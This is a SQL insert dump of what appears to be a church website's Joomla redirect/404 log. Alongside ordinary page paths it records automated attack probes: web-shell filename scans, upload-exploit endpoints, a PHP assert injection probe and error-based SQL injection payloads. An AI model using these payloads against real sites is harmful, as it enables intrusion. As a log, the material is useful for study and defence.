(7386, 'https://www.lifeoasisinternationalchurch.org/license.php', NULL, '', '', 68, 0, '2017-12-06 05:04:40', '0000-00-00 00:00:00', 301),
(7387, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/14-sample-content-3', NULL, '', '', 7, 0, '2017-12-06 13:44:38', '0000-00-00 00:00:00', 301),
(7388, 'https://lifeoasisinternationalchurch.org/live streaming', NULL, '', '', 8, 0, '2017-12-06 16:21:17', '0000-00-00 00:00:00', 301),
(7389, 'https://www.lifeoasisinternationalchurch.org/prayer/54-day3', NULL, '', '', 9, 0, '2017-12-06 20:47:28', '0000-00-00 00:00:00', 301),
(7390, 'https://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/44-programme', NULL, '', '', 12, 0, '2017-12-07 08:14:02', '0000-00-00 00:00:00', 301),
(7391, 'https://www.lifeoasisinternationalchurch.org/resources/streaming2/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-12-07 21:31:45', '0000-00-00 00:00:00', 301),
(7392, 'https://lifeoasisinternationalchurch.org/11-demo-articles/10-preset-styles', NULL, '', '', 2, 0, '2017-12-08 08:22:15', '0000-00-00 00:00:00', 301),
(7393, 'https://lifeoasisinternationalchurch.org/wp-set.php?viagrascoreone=true', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-12-08 16:16:33', '0000-00-00 00:00:00', 301),
(7394, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'a=0&view=article&id=13&itemid=213', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content\'A=0&view=article&id=13&Itemid=213', '', 8, 0, '2017-12-08 19:24:57', '0000-00-00 00:00:00', 301),
(7395, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'a=0&id=13&itemid=213', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article\'A=0&id=13&Itemid=213', '', 8, 0, '2017-12-08 19:24:59', '0000-00-00 00:00:00', 301),
(7396, 'https://lifeoasisinternationalchurch.org/blog/rss', NULL, '', '', 1, 0, '2017-12-08 20:30:06', '0000-00-00 00:00:00', 301),
(7397, 'https://www.lifeoasisinternationalchurch.org/resources/private-streaming/', NULL, '', '', 1, 0, '2017-12-08 22:15:32', '0000-00-00 00:00:00', 301),
(7398, 'https://lifeoasisinternationalchurch.org/s', NULL, '', '', 24, 0, '2017-12-09 05:28:31', '0000-00-00 00:00:00', 301),
(7399, 'https://lifeoasisinternationalchurch.org/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 5, 0, '2017-12-09 10:25:51', '0000-00-00 00:00:00', 301),
(7400, 'https://www.lifeoasisinternationalchurch.org/loic/onlinebible.php', NULL, '', '', 10, 0, '2017-12-09 12:34:42', '0000-00-00 00:00:00', 301),
(7401, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/training', NULL, '', '', 2, 0, '2017-12-09 13:37:53', '0000-00-00 00:00:00', 301),
(7402, 'https://www.lifeoasisinternationalchurch.org/church', NULL, '', '', 8, 0, '2017-12-09 14:05:12', '0000-00-00 00:00:00', 301),
(7403, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 4, 0, '2017-12-09 22:23:15', '0000-00-00 00:00:00', 301),
(7404, 'https://www.lifeoasisinternationalchurch.org/sreaming', NULL, '', '', 9, 0, '2017-12-10 06:27:50', '0000-00-00 00:00:00', 301),
(7405, 'https://www.lifeoasisinternationalchurch.org/resources/youtube-live/18-loic/50-young-achievers', NULL, '', '', 10, 0, '2017-12-10 08:02:07', '0000-00-00 00:00:00', 301),
(7406, 'https://lifeoasisinternationalchurch.org/streaming https://lifeoasisinternationalchurch.org/streaming', NULL, '', '', 1, 0, '2017-12-10 08:22:47', '0000-00-00 00:00:00', 301),
(7407, 'https://lifeoasisinternationalchurch.org/partnership/2-features/128-2017', NULL, '', '', 6, 0, '2017-12-10 09:19:28', '0000-00-00 00:00:00', 301),
(7408, 'https://www.lifeoasisinternationalchurch.org/index.php/forum/topic/create', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 2, 0, '2017-12-10 12:23:56', '0000-00-00 00:00:00', 301),
(7409, 'https://lifeoasisinternationalchurch.org/xml.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-12-11 15:34:48', '0000-00-00 00:00:00', 301),
(7410, 'https://lifeoasisinternationalchurch.org/xmlrpz.php', NULL, '', '', 14, 0, '2017-12-12 16:58:18', '0000-00-00 00:00:00', 301),
(7411, 'https://server.lifeoasisinternationalchurch.org/nmaplowercheck1513105182', NULL, '', '', 1, 0, '2017-12-12 19:00:03', '0000-00-00 00:00:00', 301),
(7412, 'https://server.lifeoasisinternationalchurch.org/hnap1', NULL, '', '', 3, 0, '2017-12-12 19:00:04', '0000-00-00 00:00:00', 301),
(7413, 'https://lifeoasisinternationalchurch.org/wp-caches.php', NULL, '', '', 7, 0, '2017-12-13 05:30:56', '0000-00-00 00:00:00', 301),
(7414, 'https://www.lifeoasisinternationalchurch.org/we', NULL, '', '', 3, 0, '2017-12-13 08:33:03', '0000-00-00 00:00:00', 301),
(7415, 'https://lifeoasisinternationalchurch.org/trainingoasisinternationalchurch.org/', NULL, '', '', 1, 0, '2017-12-13 16:58:02', '0000-00-00 00:00:00', 301),
(7416, 'https://lifeoasisinternationalchurch.org//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload', NULL, '', '', 1, 0, '2017-12-13 17:52:53', '0000-00-00 00:00:00', 301),
(7417, 'https://www.lifeoasisinternationalchurch.org/taining', NULL, '', '', 1, 0, '2017-12-13 20:48:40', '0000-00-00 00:00:00', 301),
(7418, 'https://lifeoasisinternationalchurch.org/streaming/training', NULL, '', '', 4, 0, '2017-12-13 21:22:24', '0000-00-00 00:00:00', 301),
(7419, 'https://lifeoasisinternationalchurch.org/streaming/trai8ning', NULL, '', '', 2, 0, '2017-12-13 21:22:27', '0000-00-00 00:00:00', 301),
(7420, 'https://lifeoasisinternationalchurch.org/component/content/article/18-loic/44-programme', NULL, '', '', 4, 0, '2017-12-13 22:02:32', '0000-00-00 00:00:00', 301),
(7421, 'https://lifeoasisinternationalchurch.org/component/content/article/18-loic/34-music', NULL, '', '', 6, 0, '2017-12-13 22:28:04', '0000-00-00 00:00:00', 301),
(7422, 'https://lifeoasisinternationalchurch.org/far.php', NULL, '', '', 4, 0, '2017-12-14 02:30:35', '0000-00-00 00:00:00', 301),
(7423, 'https://lifeoasisinternationalchurch.org/rep.php', NULL, '', '', 4, 0, '2017-12-14 02:30:36', '0000-00-00 00:00:00', 301),
(7424, 'https://lifeoasisinternationalchurch.org/replace.php', NULL, '', '', 4, 0, '2017-12-14 02:30:38', '0000-00-00 00:00:00', 301),
(7425, 'https://lifeoasisinternationalchurch.org/tools/replace.php', NULL, '', '', 1, 0, '2017-12-14 02:30:39', '0000-00-00 00:00:00', 301),
(7426, 'https://lifeoasisinternationalchurch.org/theme/assets/global/plugins/jquery-file-upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/theme/assets/global/plugins/jquery-file-upload/server/php/', '', 3, 0, '2017-12-15 01:09:00', '0000-00-00 00:00:00', 301),
(7427, 'https://server.lifeoasisinternationalchurch.org/nmaplowercheck1513300769', NULL, '', '', 1, 0, '2017-12-15 01:19:27', '0000-00-00 00:00:00', 301),
(7428, 'https://server.lifeoasisinternationalchurch.org/evox/about', NULL, '', '', 1, 0, '2017-12-15 01:19:28', '0000-00-00 00:00:00', 301),
(7429, 'https://lifeoasisinternationalchurch.org/discussiona/popup-pomo.php', NULL, 'http://site.ru', '', 2, 0, '2017-12-15 03:50:20', '0000-00-00 00:00:00', 301),
(7430, 'https://www.lifeoasisinternationalchurch.org/theme/assets/global/plugins/jquery-file-upload/server/php/', NULL, 'http://www.lifeoasisinternationalchurch.org/theme/assets/global/plugins/jquery-file-upload/server/php/', '', 3, 0, '2017-12-15 07:36:33', '0000-00-00 00:00:00', 301),
(7431, 'https://lifeoasisinternationalchurch.org/managera/popup-pomo.php', NULL, 'http://site.ru', '', 2, 0, '2017-12-15 08:43:24', '0000-00-00 00:00:00', 301),
(7432, 'https://lifeoasisinternationalchurch.org/cli/css.php', NULL, 'http://site.ru', '', 1, 0, '2017-12-15 11:51:12', '0000-00-00 00:00:00', 301),
(7433, 'https://www.lifeoasisinternationalchurch.org/)', NULL, '', '', 9, 0, '2017-12-15 13:13:30', '0000-00-00 00:00:00', 301),
(7434, 'https://lifeoasisinternationalchurch.org/conf.ini.php', NULL, 'http://site.ru', '', 3, 0, '2017-12-15 14:51:09', '0000-00-00 00:00:00', 301),
(7435, 'https://lifeoasisinternationalchurch.org/newlevel', NULL, '', '', 1, 0, '2017-12-15 17:32:39', '0000-00-00 00:00:00', 301),
(7436, 'https://www.lifeoasisinternationalchurch.org/private/rpassword:', NULL, '', '', 1, 0, '2017-12-15 17:37:42', '0000-00-00 00:00:00', 301),
(7437, 'https://www.lifeoasisinternationalchurch.org/streming', NULL, '', '', 2, 0, '2017-12-15 18:38:38', '0000-00-00 00:00:00', 301),
(7438, 'https://lifeoasisinternationalchurch.org/resources/live', NULL, '', '', 3, 0, '2017-12-15 20:09:01', '0000-00-00 00:00:00', 301),
(7439, 'https://lifeoasisinternationalchurch.org/layouts/system_infos.php', NULL, 'http://site.ru', '', 2, 0, '2017-12-16 00:57:52', '0000-00-00 00:00:00', 301),
(7440, 'https://lifeoasisinternationalchurch.org/dark.php', NULL, 'http://site.ru', '', 5, 0, '2017-12-16 04:16:38', '0000-00-00 00:00:00', 301),
(7441, 'https://lifeoasisinternationalchurch.org/wp-models.php', NULL, 'http://site.ru', '', 4, 0, '2017-12-16 07:22:13', '0000-00-00 00:00:00', 301),
(7442, 'https://lifeoasisinternationalchurch.org/maints/popup-pomo.php', NULL, 'http://site.ru', '', 3, 0, '2017-12-16 07:50:30', '0000-00-00 00:00:00', 301),
(7443, 'https://lifeoasisinternationalchurch.org/cli/system_infos.php', NULL, 'http://site.ru', '', 3, 0, '2017-12-16 09:49:09', '0000-00-00 00:00:00', 301),
(7444, 'https://lifeoasisinternationalchurch.org/updatecore/popup-pomo.php', NULL, 'http://site.ru', '', 9, 0, '2017-12-16 10:54:48', '0000-00-00 00:00:00', 301),
(7445, 'https://lifeoasisinternationalchurch.org/roots.php', NULL, 'http://site.ru', '', 12, 0, '2017-12-16 12:56:23', '0000-00-00 00:00:00', 301),
(7446, 'https://lifeoasisinternationalchurch.org/mide.php', NULL, 'http://site.ru', '', 6, 0, '2017-12-16 15:26:18', '0000-00-00 00:00:00', 301),
(7447, 'https://lifeoasisinternationalchurch.org/mide.php', NULL, 'http://site.ru', '', 1, 0, '2017-12-16 15:26:18', '0000-00-00 00:00:00', 301),
(7448, 'https://www.lifeoasisinternationalchurch.org/resources/live-stream/privateing', NULL, '', '', 1, 0, '2017-12-16 18:29:28', '0000-00-00 00:00:00', 301),
(7449, 'https://lifeoasisinternationalchurch.org/streaming - private', NULL, '', '', 1, 0, '2017-12-16 19:40:55', '0000-00-00 00:00:00', 301),
(7450, 'https://www.lifeoasisinternationalchurch.org/accordion-b/level-2', NULL, '', '', 6, 0, '2017-12-17 03:13:50', '0000-00-00 00:00:00', 301),
(7451, 'https://lifeoasisinternationalchurch.org/privte', NULL, '', '', 1, 0, '2017-12-17 04:45:15', '0000-00-00 00:00:00', 301),
(7452, 'https://www.lifeoasisinternationalchurch.org/sample-levels/level-2', NULL, '', '', 9, 0, '2017-12-17 05:04:59', '0000-00-00 00:00:00', 301),
(7453, 'https://lifeoasisinternationalchurch.org/resources/youtube-live/18-loic/50-young-achievers', NULL, '', '', 15, 0, '2017-12-17 06:18:31', '0000-00-00 00:00:00', 301),
(7454, 'https://lifeoasisinternationalchurch.org/st', NULL, '', '', 25, 0, '2017-12-17 07:13:55', '0000-00-00 00:00:00', 301),
(7455, 'https://lifeoasisinternationalchurch.org/logs/logs.php', NULL, 'http://site.ru', '', 8, 0, '2017-12-17 14:51:22', '0000-00-00 00:00:00', 301),
(7456, 'https://www.lifeoasisinternationalchurch.org/up.php', NULL, '', '', 41, 0, '2017-12-17 19:56:01', '0000-00-00 00:00:00', 301),
(7457, 'https://lifeoasisinternationalchurch.org/super celebration service', NULL, '', '', 1, 0, '2017-12-17 21:42:59', '0000-00-00 00:00:00', 301),
(7458, 'https://lifeoasisinternationalchurch.org/media/mod.php', NULL, 'http://site.ru', '', 4, 0, '2017-12-17 23:39:06', '0000-00-00 00:00:00', 301),
(7459, 'https://lifeoasisinternationalchurch.org/sim1.php', NULL, 'http://site.ru', '', 2, 0, '2017-12-18 07:50:50', '0000-00-00 00:00:00', 301),
(7460, 'https://lifeoasisinternationalchurch.org/whms', NULL, '', '', 1, 0, '2017-12-18 20:18:28', '0000-00-00 00:00:00', 301),
(7461, 'https://lifeoasisinternationalchurch.org/index.php/forum/topic/create', NULL, 'https://lifeoasisinternationalchurch.org/', '', 5, 0, '2017-12-18 21:43:45', '0000-00-00 00:00:00', 301),
(7462, 'https://www.lifeoasisinternationalchurch.org/resources/ltraining', NULL, '', '', 2, 0, '2017-12-18 21:55:53', '0000-00-00 00:00:00', 301),
(7463, 'https://lifeoasisinternationalchurch.org/bps.php', NULL, '', '', 2, 0, '2017-12-19 08:26:15', '0000-00-00 00:00:00', 301),
(7464, 'https://unite.nike.comhttps//unite.nike.com/session.html', NULL, 'https://www.nike.com/cn/launch/t/kyrie-s1-hybrid-what-the-blue-white', '', 1, 0, '2017-12-19 08:57:24', '0000-00-00 00:00:00', 301),
(7465, 'https://lifeoasisinternationalchurch.org/rsau.php', NULL, '', '', 3, 0, '2017-12-19 13:05:52', '0000-00-00 00:00:00', 301),
(7466, 'https://lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration', NULL, '', '', 7, 0, '2017-12-19 15:43:57', '0000-00-00 00:00:00', 301),
(7467, 'https://lifeoasisinternationalchurch.org/test.php', NULL, '', '', 49, 0, '2017-12-19 17:40:12', '0000-00-00 00:00:00', 301),
(7468, 'https://lifeoasisinternationalchurch.org/wp-cahce.php', NULL, '', '', 5, 0, '2017-12-19 22:18:24', '0000-00-00 00:00:00', 301),
(7469, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/pregnant%20women', NULL, '', '', 3, 0, '2017-12-20 01:39:20', '0000-00-00 00:00:00', 301),
(7470, 'https://lifeoasisinternationalchurch.org/sqladminer/', NULL, '', '', 1, 0, '2017-12-21 04:20:14', '0000-00-00 00:00:00', 301),
(7471, 'https://lifeoasisinternationalchurch.org/adm.php', NULL, '', '', 8, 0, '2017-12-21 04:20:16', '0000-00-00 00:00:00', 301),
(7472, 'https://lifeoasisinternationalchurch.org/adminer_nq.php', NULL, '', '', 3, 0, '2017-12-21 04:20:17', '0000-00-00 00:00:00', 301),
(7473, 'https://www.lifeoasisinternationalchurch.org/divine-agenda/itemlist/tag/', NULL, '', '', 3, 0, '2017-12-21 10:22:42', '0000-00-00 00:00:00', 301),
(7474, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=jj8jj-o-evi', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2017-12-21 21:25:42', '0000-00-00 00:00:00', 301),
(7475, 'https://www.lifeoasisinternationalchurch.org/partnership/2-features/128-under-maintenance', NULL, '', '', 10, 0, '2017-12-22 11:20:52', '0000-00-00 00:00:00', 301),
(7476, 'https://lifeoasisinternationalchurch.org/friday', NULL, '', '', 1, 0, '2017-12-22 17:34:33', '0000-00-00 00:00:00', 301),
(7477, 'https://lifeoasisinternationalchurch.org/privte-streaming', NULL, '', '', 1, 0, '2017-12-22 18:55:27', '0000-00-00 00:00:00', 301),
(7478, 'https://lifeoasisinternationalchurch.org/privatel', NULL, '', '', 1, 0, '2017-12-22 19:23:24', '0000-00-00 00:00:00', 301),
(7479, 'https://www.lifeoasisinternationalchurch.org/gobc2016', NULL, '', '', 26, 0, '2017-12-23 02:41:35', '0000-00-00 00:00:00', 301),
(7480, 'https://lifeoasisinternationalchurch.org/prayer/54-day3', NULL, '', '', 2, 0, '2017-12-23 09:37:30', '0000-00-00 00:00:00', 301),
(7481, 'https://lifeoasisinternationalchurch.org/customer/account/create/', NULL, '', '', 2, 0, '2017-12-23 10:43:21', '0000-00-00 00:00:00', 301),
(7482, 'https://lifeoasisinternationalchurch.org/partnership/levelto', NULL, 'http://m.facebook.com', '', 1, 0, '2017-12-23 17:53:22', '0000-00-00 00:00:00', 301),
(7483, 'https://www.lifeoasisinternationalchurch.org/resources/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2017-12-23 18:21:46', '0000-00-00 00:00:00', 301),
(7484, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/popup?tmpl=component', NULL, '', '', 3, 0, '2017-12-24 19:09:17', '0000-00-00 00:00:00', 301),
(7485, 'https://www.lifeoasisinternationalchurch.org/index.php/heart', NULL, '', '', 7, 0, '2017-12-25 11:52:11', '0000-00-00 00:00:00', 301),
(7486, 'https://lifeoasisinternationalchurch.org/trianing', NULL, '', '', 1, 0, '2017-12-25 21:52:14', '0000-00-00 00:00:00', 301),
(7487, 'https://lifeoasisinternationalchurch.org/assets/global/plugins/jquery-file-upload/server/php/', NULL, 'http://lifeoasisinternationalchurch.org/assets/global/plugins/jquery-file-upload/server/php/', '', 1, 0, '2017-12-26 04:14:18', '0000-00-00 00:00:00', 301),
(7488, 'https://www.lifeoasisinternationalchurch.org/template-info', NULL, 'http://www.lifeoasisinternationalchurch.org/template-info', '', 6, 0, '2017-12-26 20:41:16', '0000-00-00 00:00:00', 301),
(7489, 'https://lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 12, 0, '2017-12-27 00:33:44', '0000-00-00 00:00:00', 301),
(7490, 'https://lifeoasisinternationalchurch.org/user/', NULL, '', '', 15, 0, '2017-12-27 10:40:23', '0000-00-00 00:00:00', 301),
(7491, 'https://lifeoasisinternationalchurch.org/index.php/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 5, 0, '2017-12-27 21:00:29', '0000-00-00 00:00:00', 301),
(7492, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=gupi23rmuhu', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 3, 0, '2017-12-27 21:24:46', '0000-00-00 00:00:00', 301),
(7493, 'https://lifeoasisinternationalchurch.org/streaminprivate', NULL, '', '', 1, 0, '2017-12-27 21:55:33', '0000-00-00 00:00:00', 301),
(7494, 'https://lifeoasisinternationalchurch.org/streag', NULL, '', '', 1, 0, '2017-12-27 22:20:30', '0000-00-00 00:00:00', 301),
(7495, 'https://www.lifeoasisinternationalchurch.org/resources/hd/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2017-12-29 01:23:59', '0000-00-00 00:00:00', 301),
(7496, 'https://lifeoasisinternationalchurch.org/inl.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-12-29 11:29:33', '0000-00-00 00:00:00', 301),
(7497, 'https://lifeoasisinternationalchurch.org/ws.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-12-29 11:30:12', '0000-00-00 00:00:00', 301),
(7498, 'https://lifeoasisinternationalchurch.org/wp-help.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-12-29 11:33:01', '0000-00-00 00:00:00', 301),
(7499, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/21', NULL, '', '', 2, 0, '2017-12-29 18:15:19', '0000-00-00 00:00:00', 301),
(7500, 'https://lifeoasisinternationalchurch.org/streamingradio', NULL, '', '', 1, 0, '2017-12-29 19:02:44', '0000-00-00 00:00:00', 301),
(7501, 'https://lifeoasisinternationalchurch.org/simmp', NULL, '', '', 10, 0, '2017-12-29 19:14:03', '0000-00-00 00:00:00', 301),
(7502, 'https://www.nike.comhttps//www.nike.com/cn/launch/?s=upcoming', NULL, '', '', 1, 0, '2017-12-29 20:11:12', '0000-00-00 00:00:00', 301),
(7503, 'https://lifeoasisinternationalchurch.org/40thawc/@regrann', NULL, '', '', 1, 0, '2017-12-30 09:31:14', '0000-00-00 00:00:00', 301),
(7504, 'https://www.lifeoasisinternationalchurch.org/resources/salvation/18-loic/50-young-achievers', NULL, '', '', 11, 0, '2017-12-31 05:33:21', '0000-00-00 00:00:00', 301),
(7505, 'https://lifeoasisinternationalchurch.org/privatre', NULL, '', '', 1, 0, '2017-12-31 06:39:00', '0000-00-00 00:00:00', 301),
(7506, 'https://www.lifeoasisinternationalchurch.org/3gp', NULL, '', '', 1, 0, '2018-01-01 00:12:03', '0000-00-00 00:00:00', 301),
(7507, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 5, 0, '2018-01-01 02:08:00', '0000-00-00 00:00:00', 301),
(7508, 'https://www.lifeoasisinternationalchurch.org/template-info-2/the-church-2/18-loic/50-young-achievers', NULL, '', '', 10, 0, '2018-01-01 08:10:20', '0000-00-00 00:00:00', 301),
(7509, 'https://lifeoasisinternationalchurch.org/config.php', NULL, 'http://site.ru', '', 5, 0, '2018-01-01 14:20:54', '0000-00-00 00:00:00', 301),
(7510, 'https://lifeoasisinternationalchurch.org/loic/churchlocations.php', NULL, '', '', 9, 0, '2018-01-03 03:14:36', '0000-00-00 00:00:00', 301),
(7511, 'https://lifeoasisinternationalchurch.org/lfm.php', NULL, 'http://site.ru', '', 10, 0, '2018-01-03 08:57:42', '0000-00-00 00:00:00', 301),
(7512, 'https://lifeoasisinternationalchurch.org/logs/ybbbcc.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-03 10:37:52', '0000-00-00 00:00:00', 301),
(7513, 'https://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library', NULL, 'http://lifeoasisinternationalchurch.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library', '', 1, 0, '2018-01-03 14:50:06', '0000-00-00 00:00:00', 301),
(7514, 'https://lifeoasisinternationalchurch.org/conflg.php', NULL, 'http://site.ru', '', 6, 0, '2018-01-03 20:13:51', '0000-00-00 00:00:00', 301),
(7515, 'https://www.lifeoasisinternationalchurch.org/programmes', NULL, '', '', 14, 0, '2018-01-04 09:33:05', '0000-00-00 00:00:00', 301),
(7516, 'https://lifeoasisinternationalchurch.org/media/media.php?1=assert&2=die(pi()*42);', NULL, '', '', 4, 0, '2018-01-04 15:55:57', '0000-00-00 00:00:00', 301),
(7517, 'https://www.lifeoasisinternationalchurch.org/index.php/template-info-2/our-service-schedule', NULL, '', '', 4, 0, '2018-01-04 19:16:09', '0000-00-00 00:00:00', 301),
(7518, 'https://www.lifeoasisinternationalchurch.org/zabbix/index.php', NULL, '', '', 2, 0, '2018-01-05 01:35:59', '0000-00-00 00:00:00', 301),
(7519, 'https://www.lifeoasisinternationalchurch.org/0day.php', NULL, 'http://www.lifeoasisinternationalchurch.org/0day.php', '', 1, 0, '2018-01-05 02:50:22', '0000-00-00 00:00:00', 301),
(7520, 'https://lifeoasisinternationalchurch.org/0day.php', NULL, 'http://lifeoasisinternationalchurch.org/0day.php', '', 1, 0, '2018-01-05 02:53:30', '0000-00-00 00:00:00', 301),
(7521, 'https://lifeoasisinternationalchurch.org/cwyiog.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-05 07:31:55', '0000-00-00 00:00:00', 301),
(7522, 'https://lifeoasisinternationalchurch.org/media/editors/codemirror/mode/d/update.php', NULL, 'http://site.ru', '', 3, 0, '2018-01-05 09:33:03', '0000-00-00 00:00:00', 301),
(7523, 'https://www.lifeoasisinternationalchurch.org//zabbix/index.php', NULL, '', '', 4, 0, '2018-01-05 20:34:27', '0000-00-00 00:00:00', 301),
(7524, 'https://lifeoasisinternationalchurch.org/f.php', NULL, 'http://site.ru', '', 3, 0, '2018-01-06 09:45:04', '0000-00-00 00:00:00', 301),
(7525, 'https://lifeoasisinternationalchurch.org/tmp/inj.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-06 14:08:21', '0000-00-00 00:00:00', 301),
(7526, 'https://lifeoasisinternationalchurch.org/librareis.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-06 17:11:17', '0000-00-00 00:00:00', 301),
(7527, 'https://lifeoasisinternationalchurch.org/readme.php', NULL, 'http://site.ru', '', 4, 0, '2018-01-06 17:51:37', '0000-00-00 00:00:00', 301),
(7528, 'https://lifeoasisinternationalchurch.org/outpost.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-07 02:14:34', '0000-00-00 00:00:00', 301),
(7529, 'https://lifeoasisinternationalchurch.org/print.php', NULL, 'http://site.ru', '', 5, 0, '2018-01-07 04:08:29', '0000-00-00 00:00:00', 301),
(7530, 'https://lifeoasisinternationalchurch.org/libraries/joomla/css.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-07 04:42:21', '0000-00-00 00:00:00', 301),
(7531, 'https://lifeoasisinternationalchurch.org/resources/private-streaming/', NULL, '', '', 1, 0, '2018-01-07 06:08:52', '0000-00-00 00:00:00', 301),
(7532, 'https://lifeoasisinternationalchurch.org/private-streaming', NULL, '', '', 2, 0, '2018-01-07 08:42:41', '0000-00-00 00:00:00', 301),
(7533, 'https://lifeoasisinternationalchurch.org/cli/run_cron.php', NULL, 'http://site.ru', '', 3, 0, '2018-01-07 09:10:09', '0000-00-00 00:00:00', 301),
(7534, 'https://lifeoasisinternationalchurch.org/40thawc/index.php', NULL, 'https://lifeoasisinternationalchurch.org/asom2018/', '', 92, 0, '2018-01-07 10:17:07', '0000-00-00 00:00:00', 301),
(7535, 'https://lifeoasisinternationalchurch.org/40thawc/index.php/component/ajax/?format=json', NULL, 'https://lifeoasisinternationalchurch.org/40thawc/', '', 1, 0, '2018-01-07 10:37:27', '0000-00-00 00:00:00', 301),
(7536, 'https://lifeoasisinternationalchurch.org/mod_config.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-07 11:48:02', '0000-00-00 00:00:00', 301),
(7537, 'https://lifeoasisinternationalchurch.org/pdo.inc.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-07 12:16:25', '0000-00-00 00:00:00', 301),
(7538, 'https://lifeoasisinternationalchurch.org/40thawc/index.php/accommodation', NULL, '', '', 23, 0, '2018-01-07 15:34:22', '0000-00-00 00:00:00', 301),
(7539, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&itemid=0', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0', '', 1, 0, '2018-01-07 21:10:03', '0000-00-00 00:00:00', 301),
(7540, 'https://lifeoasisinternationalchurch.org/asom2018/twitter.com/reverendareogun', NULL, '', '', 22, 0, '2018-01-07 22:36:04', '0000-00-00 00:00:00', 301),
(7541, 'https://142.4.21.132/index.php?option=com_ns_downloadshop&task=invoice.create&id=(select 2458 from(select count(*),concat(md5(1234),(select (elt(2458=2458,1))),0x7178627671,floor(rand(0)*2))x from information_schema.plugins group by x)a)', NULL, '', '', 3, 0, '2018-01-08 07:28:10', '0000-00-00 00:00:00', 301),
(7542, 'https://api.nike.comhttps//api.nike.com/launch/launch_views/v2/?filter=productid(0b79078b-cc55-5cb0-84e2-85cfbf3ea9dc)', NULL, 'https://www.nike.com/cn/launch/t/sb-zoom-dunk-low-pro-medium-olive-black', '', 1, 0, '2018-01-08 19:47:58', '0000-00-00 00:00:00', 301),
(7543, 'https://www.lifeoasisinternationalchurch.org/bibleschool.php', NULL, '', '', 4, 0, '2018-01-08 21:06:40', '0000-00-00 00:00:00', 301),
(7544, 'https://lifeoasisinternationalchurch.org/load-config.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 05:29:16', '0000-00-00 00:00:00', 301),
(7545, 'https://142.4.21.132/index.php?option=com_zhyandexmap&view=zhyandexmap&tmpl=component&id=3&placemarklistid=-1660) or 1 group by concat(md5(1234),(select (case when (6691=6691) then 1 else 0 end)),0x716b7a7671,floor(rand(0)*2)) having min(0)', NULL, '', '', 1, 0, '2018-01-09 05:46:48', '0000-00-00 00:00:00', 301),
(7546, 'https://www.lifeoasisinternationalchurch.org/gobc-2014-online-registration', NULL, '', '', 11, 0, '2018-01-09 05:51:17', '0000-00-00 00:00:00', 301),
(7547, 'https://lifeoasisinternationalchurch.org/tmp/kd.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 08:41:09', '0000-00-00 00:00:00', 301),
(7548, 'https://lifeoasisinternationalchurch.org/media/system/js/cms.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 08:45:21', '0000-00-00 00:00:00', 301),
(7549, 'https://lifeoasisinternationalchurch.org/media/editors/tinymce/skins/lightgray/img/strange.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 10:08:23', '0000-00-00 00:00:00', 301),
(7550, 'https://lifeoasisinternationalchurch.org/modules/mod_default/tmpl/template.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-09 11:30:11', '0000-00-00 00:00:00', 301),
(7551, 'https://lifeoasisinternationalchurch.org/ui-elements.php', NULL, 'http://site.ru', '', 1, 0, '2018-01-09 12:51:58', '0000-00-00 00:00:00', 301),
(7552, 'https://lifeoasisinternationalchurch.org/language/language.php', NULL, 'http://site.ru', '', 2, 0, '2018-01-09 14:06:46', '0000-00-00 00:00:00', 301),
